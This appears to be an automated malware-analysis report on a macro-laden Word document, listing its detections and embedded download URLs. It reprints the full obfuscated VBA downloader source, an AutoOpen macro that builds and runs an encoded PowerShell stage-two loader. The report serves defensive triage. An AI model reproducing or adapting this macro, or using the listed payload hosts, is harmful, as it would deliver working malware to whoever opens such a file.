MALICIOUS
410
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains VBA macros that utilize WScript.Shell and CreateObject to execute commands. The AutoOpen macro attempts to construct and execute a PowerShell command, which is likely responsible for downloading a second-stage payload from one of the embedded URLs. The obfuscated nature of the script and the presence of multiple suspicious URLs indicate a downloader or droppper functionality.
Heuristics 12
-
ClamAV: Doc.Malware.Valyria-6874850-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6874850-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
TBQjR = (zAiMS + QkPpum / 38376 + VURRC + (KvaVj - WfvHQ)) cEMJkBV = wTtWr + CreateObject("Wscript.shell").Run(LBSHcj + Chr(vbKeyP) + lzqwO + Chr(vbKeyO) + VzMFjdrnQo + KoGzwaT, 960952536 - 960952536) PXmtC = (Tiqwa + FIGbzw / 68583 + jBqCZJ + (SRloHZ - XwibSw)) -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
TBQjR = (zAiMS + QkPpum / 38376 + VURRC + (KvaVj - WfvHQ)) cEMJkBV = wTtWr + CreateObject("Wscript.shell").Run(LBSHcj + Chr(vbKeyP) + lzqwO + Chr(vbKeyO) + VzMFjdrnQo + KoGzwaT, 960952536 - 960952536) PXmtC = (Tiqwa + FIGbzw / 68583 + jBqCZJ + (SRloHZ - XwibSw)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
TBQjR = (zAiMS + QkPpum / 38376 + VURRC + (KvaVj - WfvHQ)) cEMJkBV = wTtWr + CreateObject("Wscript.shell").Run(LBSHcj + Chr(vbKeyP) + lzqwO + Chr(vbKeyO) + VzMFjdrnQo + KoGzwaT, 960952536 - 960952536) PXmtC = (Tiqwa + FIGbzw / 68583 + jBqCZJ + (SRloHZ - XwibSw)) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "nKhfkHl" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.trustytampa.com/441uuNO9/ Referenced by macro
- http://www.intranet-sodimavi.com/AAFi9FkeO/Referenced by macro
- http://www.qpalconsultancy.com/wp-content/O5CjQTL/Referenced by macro
- http://www.sonaedons.com/eFtSiFT/Referenced by macro
- https://www.mababo-bau.eu/CHXJmm/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9589 bytes |
SHA-256: 363e0f9b3bc0da9c6686443ba79f1c44b8a6869c1cb8e06b7e3c480811c53ffe |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
154 of 284 identifiers look randomly generated (e.g. 'AzXmHjhvmXMlE') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JSMwwrImcuHn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nKhfkHl"
Sub AutoOpen()
On Error Resume Next
zcdwOQ = 44165 * HZsjNk + 89297 / uNqFt / RwvWw * sTmrb + 7331 * QUvKj / fdMlQw / lhMTb
KFTWSl = 81658 * jUjJw + 25539 / AFlpZ / rjaWn * PUuCvf + 65072 * BWXzf / YIEBwo / kqHfiu
SYsAf = 89573 * DlSoiQ + 13239 / dhlJj / ibZXwP * dmWRkV + 76352 * iXUlRV / mNUYU / MatVO
rqKfBs = 34260 * jnnAI + 19090 / dqzCGI / jFMiZ * XLHSQz + 22722 * GpuRR / wpYlIm / IrMQUT
kwTcj = 60072 * ZwvXtu + 36886 / zKRYOX / pLCau * RMcvV + 4211 * fLunF / wXqqb / BUNPcw
kImwJ = 84622 * EpSbCm + 69084 / lwwzCn / bFYMG * fzBWNl + 91467 * RVXdH / wFnBwC / nDBfF
hjjZzl = 83999 * rQFoA + 77617 / TaZUu / GWSXN * bstAq + 14515 * Ojkva / PLEoiM / NqTdcL
vYHHa = 12040 * fImSbX + 85714 / OoQiS / bowVbw * wEzAzV + 12256 * YDUhVq / lXPDkm / YzwdI
AzXmHjhvmXMlE (BmdoJak + vLJik + SrWkjM + hHzwzJW)
dbKOC = 69247 * QjzQPh + 91122 / pjiwci / BhjKOq * ZQYfwb + 74589 * WsqKz / GXTfDn / kzdij
WiSOM = 17873 * vSQwmU + 55362 / VVkmwL / VijlcC * SDYhP + 39133 * ccnMfY / IhwZG / OBcjQ
jIohbj = 72157 * AMZFFI + 84388 / szaTml / zkLWc * QaoQao + 49725 * vLfuiE / HrUwhW / fIzCu
ZcisVq = 60502 * hsjkT + 75941 / MlHSf / vKQfL * kpRuz + 31260 * NvrAVT / XZfju / AjXNVP
End Sub
Function BmdoJak()
On Error Resume Next
HOGan = 10948 * jpjWa + GRjPt * GBFqX - 11684 / TUDAM
coXprE = (wFtuH + 23757)
jUzVaV = (RuFPpz + 46342)
zRzcur = (QBXjUh + 73792)
sjpkDwuNkS = "wers" + "hell " + " " + " " + " [St" + "riNg" + "]::Joi" + "n" + Chr(40) + " '' ," + Chr(40) + " '58s106" + "a84k79~35"
qBXhTT = (FYSpB + 8277)
FAqAH = (OsdcPR + 31937)
zrBRfw = (aRJjit + 40272)
izjVVK = (LmOSu + 43053)
ptNWGS = "{112G123" + "s105" + "&51j113" + "j124{" + "116&123j1" + "25&106" + "G62j80j12" + "3G106s48s"
OBlahN = (SGjjob + 61938)
KRTWhd = (PNKGWE + 23446)
DMBHJ = (JphlW + 57968)
WHFDtm = (kcrNIb + 74732)
oMlVrntY = "73>123" + ">124>93s" + "114a" + "119G" + "123j1" + "12b106" + "b37G" + "58{110s1"
pLjzv = (afupji + 50563)
Zhwzzu = (MYwpj + 74768)
owiZP = (QRzwMw + 84535)
smPrYZ = (BZcrv + 67724)
Sdkjm = "00G7" + "1~35s57" + "a118>" + "106s" + "106{1" + "10G36a4" + "9G49{1" + "05&1" + "05~10" + "5{48" + "k106b10" + "8k107k"
LnnzG = (nHZrGA + 35771)
Hswbm = (SNVkHj + 86849)
YGiUwf = (SzNwzS + 60832)
TCrmi = (morozz + 35324)
bwCkcPzQ = "109j106s1" + "03k106" + "G127b115" + "s110{127a" + "48b125a1" + "13&1" + "15k4" + "9~42k42" + "&47j1" + "07>10"
aCJRHs = (pOOoz + 74508)
iknpB = (WpnaG + 65115)
rfwhZ = (qUzVf + 84283)
FjHiww = (OofipZ + 1268)
PooRsc = "7>80~" + "81~39&4" + "9>94~11" + "8~10" + "6s10" + "6~110>36s" + "49b49"
FFnlQw = (IHjpA + 81356)
WBzoK = (UpaiGX + 52056)
CANrz = (YqMiq + 82242)
irTErO = (JjrzZd + 98450)
GTMYF = "G105" + ">105k1" + "05b48b1" + "19>112G1" + "06b108~" + "127&" + "112{123s" + "106{51" + "b109~11" + "3s122~1" + "19~11" + "5G127{10"
BmdoJak = sjpkDwuNkS + ptNWGS + oMlVrntY + Sdkjm + bwCkcPzQ + PooRsc + GTMYF
sEuZA = (Roiwl + 86865)
siWzDR = (AjJPk + 22623)
TIQSWL = (TLkBj + 95972)
BtWkr = (tqnCA + 56142)
End Function
Function vLJik()
On Error Resume Next
vjUtt = (EPuHN + 88563)
dnOmJu = (YLvzr + 62818)
AcVOS = (fVlplw + 27739)
NVjGAf = (zKSIG + 51637)
dmbIGrX = "4s119>4" + "8j125s113" + ">115>49a" + "95&95G88" + "j119s3" + "9>88j117b" + "123a81{49" + "{94>" + "118{1" + "06s106" + "a110{" + "36&49G"
KrjuiJ = (uKBNON + 5144)
NZujBG = (qmYdz + 25587)
CFLSD = (zawpTo + 78738)
oJJzR = (SjObRl + 67731)
wRdMrGnzSQ = "49>105b" + "105&105" + "G48b111~1" + "10>127" + "G114k125" + "G113b1" + "12b10" + "9b107G" + "114b106" + ">127s112{"
kFLUB = (VsDPvQ + 98707)
HVVfkl = (pwCYM + 82544)
rjARI = (NZunm + 65781)
wWkVS = (BzIQz + 68775)
fYTnHjdi = "125k1" + "03{48>12" + "5&11" + "3k115k49" + ">105~" + "110s51"
DLLXhT = (XVTtdq + 95704)
zBmHvJ = (QjVij + 62011)
iSDhK = (rEOCA + 51531)
zULJb = (zozsPQ + 28950)
nGBqbPj = "~125b113b" + "112&10" + "6k12" + "3&112~" + "106G49{81" + "k43G93~11" + "6j79a74~" + "82>49"
GwVjs = (XAIkC + 20078)
tCEkJp = (JiMlDU + 7869)
jlZnR = (drCcvF + 32986)
jkqfuz = (hAXjXr + 22893)
JmRzRXwYaf = "~94k118" + "~106G106" + "k110{" + "36s4" + "9k49a" + "105G105~1" + "05j4" + "8j109>1" + "13k1" + "12s1" + "27&1"
Zabio = (REHKO + 97858)
wauqsH = (Shlbuu + 66686)
CDtDRs = (ZqUHA + 9759)
ISIwRd = (wIwIXi + 52642)
wknEQw = "23>122a11" + "3b11" + "2&109~" + "48>125~1" + "13G11" + "5{49s1" + "23k88a10"
ThjoJ = (zNwVFD + 90189)
UnDjUm = (QMSoLH + 45390)
utKict = (MJMTdz + 51207)
qikPC = (bouRLz + 24386)
ZKZlFwYD = "6k77&" + "119{88~" + "74&49j94" + "&118k106k" + "106~110s" + "109>36b" + "49j49j10" + "5k105~1" + "05s4" + "8k115G12"
VjmYC = (nUosV + 37569)
rhSPr = (TmAvAs + 56149)
QQRwh = (pYQti + 76271)
ZWSar = (DQYlY + 48420)
qWmBnpLjK = "7G124" + "~127~124&" + "113~51k" + "124&127{" + "107j48s12" + "3b107~4" + "9j93a86&" + "70a84>115" + "~115>" + "49b57"
iwFmHk = (jRCNAA + 30161)
QPCrw = (zJQHV + 9874)
rftWYW = (GABfU + 61520)
aRiOc = (STwQo + 49523)
tzEGn = "~48>7" + "7G110j1" + "14a119&1" + "06&54k5" + "7&94&57k" + "55>37~58s" + "89>110G" + "118a6" + "2{35>" + "62a57k" + "44>41~4" + "0s57>37~5"
vLJik = dmbIGrX + wRdMrGnzSQ + fYTnHjdi + nGBqbPj + JmRzRXwYaf + wknEQw + ZKZlFwYD + qWmBnpLjK + tzEGn
arEkc = (EIqki + 72598)
VCZfX = (aJbmj + 59502)
uWXhc = (wMrqwK + 63508)
iOJJM = (GuaPN + 76714)
End Function
Function SrWkjM()
On Error Resume Next
GJjBGa = (AWtjaS + 54524)
XzJsEE = (IJffPq + 53469)
zvHTo = (cJRLa + 8853)
HGcai = (CzLZJ + 74504)
AzXzvLS = "8~119G119" + "b83a" + "35k58{12" + "3&11" + "2&104j3" + "6b106a1" + "23b115s11" + "0~53{57" + "&66>5"
ARpfWo = (PRGvsZ + 38769)
MDoVJ = (itoAAr + 66981)
Wwjwnd = (ZHVbwz + 51280)
LozYwu = (dQDiks + 73974)
QakzsiMGfo = "7>53>58" + "a89b110G" + "118>5" + "3s57~4" + "8~123" + "{102>12" + "3j57~3" + "7~12" + "0&113{1"
uqwoU = (GuBXum + 40834)
CRbWL = (BiHtE + 69708)
sJtHm = (JXJbRQ + 54776)
JXwCAT = (NivYr + 2784)
sPbLGnZuNK = "08G123~" + "127j125a" + "118j" + "54>58" + "k73k87" + "{117s62"
XhUXDS = (ldbsm + 2686)
jkJYVC = (KJnHB + 78598)
fbzjvz = (VsAuFK + 89137)
PCzQTw = (NXUYpj + 47422)
XOIhii = ">119>112G" + "62s58" + "a110{" + "100~71k55" + "j101&106a" + "108a10" + "3{101" + ">58G106" + "~84j" + "79{48~" + "90a113j10" + "5b112~"
dwIRF = (YvVhv + 97730)
oPccW = (jvmfvF + 75143)
aOWHM = (BQJvmY + 54973)
sndMw = (tuWQYa + 20799)
rGXrEAAuqRK = "114j" + "113a127>" + "122~" + "88j1" + "19b1" + "14~123s" + "54G58a73b"
TCWsd = (jHsVz + 14083)
ljWHd = (UCCjw + 18596)
jsGil = (jcuTJB + 76359)
wAzRr = (paTuf + 95304)
TzMnYrDQr = "87j117s" + "50>62j58&" + "119s11" + "9~83&" + "55k37s" + "77a106" + "a127k"
SrWkjM = AzXzvLS + QakzsiMGfo + sPbLGnZuNK + XOIhii + rGXrEAAuqRK + TzMnYrDQr
DaZiM = (pljGuD + 15009)
RCZcD = (MpwdU + 88228)
iGZLD = (izvXMj + 72830)
TuTAH = (BPAkh + 77974)
End Function
Function hHzwzJW()
On Error Resume Next
kFiBW = (FVRonu + 92941)
mhHlL = (roqfp + 38663)
BPFoiO = (QvVvIL + 48256)
XQwGlm = (kzNBjm + 1807)
VoOiZuTT = "108k1" + "06s51{78" + "a108j113&" + "125{123s1" + "09k109s6" + "2k58k119" + "G119s83a" + "37~1" + "24s10" + "8~123"
IFNUj = (tYonKz + 11006)
wnFulO = (AwEcZ + 84320)
FacftP = (jNBZNE + 62116)
IbwSmc = (AjCuHp + 97719)
sjoiSrjKqbO = "G127a1" + "17b37{99k" + "125a127" + "{106s125a" + "118G10" + "1~99&" + "99'." + "SplIt" + Chr(40) + " 'b" + "sa{>G"
vSnNw = (LOiTCM + 50971)
lsZnR = (zvkpY + 13432)
cwIrkT = (lIJuN + 90142)
zOJCBn = (kHutTi + 65946)
CCwhvbfjLwL = "~k&j" + "' " + Chr(41) + " | " + "FOrEa" + "cH-obJ" + "ecT {[" + "cHaR]" + Chr(40) + " $"
JdSjk = (OQKAKm + 21215)
rPBGjH = (mYnkjm + 23375)
qOwRkW = (WRVZdD + 3383)
YNdjc = (ibKizT + 86127)
wjwQwmORJPq = "_-BXOr" + " " + Chr(34) + "0x1e" + Chr(34) + " " + Chr(41) + "} " + Chr(41) + " " + Chr(41) + " |ieX "
hHzwzJW = VoOiZuTT + sjoiSrjKqbO + CCwhvbfjLwL + wjwQwmORJPq
JHjMzl = (jFiQMm + 77429)
Puuzp = (jwrmp + 72222)
mDkvZG = (XXulm + 78720)
wvoSfA = (QGvqEi + 91857)
End Function
Attribute VB_Name = "rzQKIIjlkoiUSE"
Function AzXmHjhvmXMlE(VzMFjdrnQo)
On Error Resume Next
vYIjQp = (qYuPHv + SXtizz / 90881 + lVVLW + (qdPSK - NYtNfB))
amNsb = (EWGanG + pannL / 10048 + pAuiz + (AStijz - sViXct))
RjjDc = (KEnlG + ahPZs / 67082 + ipmccu + (LIUsQK - kBJQq))
mmviI = (iZNcv + oiOiiE / 13499 + nzCjv + (wjpfF - BfHsu))
TEQPz = (ZCbcDF + FJhPm / 70238 + jnbuj + (WmnIaW - XkCtXC))
KstUf = (IAzUQU + iYjdV / 62179 + InOSB + (VzUHos - OBqtHO))
YVmTsF = (BwEYX + mNWiaS / 96505 + IjrjY + (thhmWH - qmAvaw))
TBQjR = (zAiMS + QkPpum / 38376 + VURRC + (KvaVj - WfvHQ))
cEMJkBV = wTtWr + CreateObject("Wscript.shell").Run(LBSHcj + Chr(vbKeyP) + lzqwO + Chr(vbKeyO) + VzMFjdrnQo + KoGzwaT, 960952536 - 960952536)
PXmtC = (Tiqwa + FIGbzw / 68583 + jBqCZJ + (SRloHZ - XwibSw))
TZOUdP = (tvhzYR + OjkTtr / 1609 + FHSYT + (KsVfnA - bchwt))
ZWDrj = (KJPzH + EzDTG / 3451 + vpjCL + (kROmE - Xzpbt))
QjQJb = (uNFjDJ + VfrzN / 80270 + rZzqv + (KukZP - JRqSo))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.